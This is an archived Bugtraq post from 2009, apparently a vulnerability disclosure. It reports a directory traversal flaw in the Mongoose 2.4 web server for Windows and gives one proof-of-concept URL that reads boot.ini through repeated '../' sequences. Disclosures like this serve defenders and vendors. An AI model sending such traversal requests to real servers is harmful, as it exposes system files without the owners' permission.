[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

MonGoose 2.4 Directory Traversal Vulnerability

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: MonGoose 2.4 Directory Traversal Vulnerability
From: ew1zz@xxxxxxxxxxx
Date: 13 Apr 2009 23:18:16 -0000

######### MonGoose 2.4 (win) webserver Directory Traversal  #########



######By:  e.wiZz!

######Site: www.balcansecurity.com



Found with ServMeNot (world's sexiest fuzzer :P)




In the wild...

#########################################################################################

[Info]: Easy to use web server for Windows and UNIX. Mongoose provides simple 
and clean API
 for embedding it into existing programs. Targeting Web application developers, 
embedded system developers,
 and people who need to setup file sharing quickly.

[Site]: http://code.google.com/p/mongoose/


[Vulnerability]:  

http://[localhost]/../../../../../../boot.ini

Prev by Date: Re: PHP-Revista Multiple vulnerabilities
Next by Date: Re: [NOBYTES.COM: #12] osCommerce 2.2rc2a - Information Disclosure
Previous by thread: Re: PHP-Revista Multiple vulnerabilities
Next by thread: Re: [NOBYTES.COM: #12] osCommerce 2.2rc2a - Information Disclosure
Index(es):
- Date
- Thread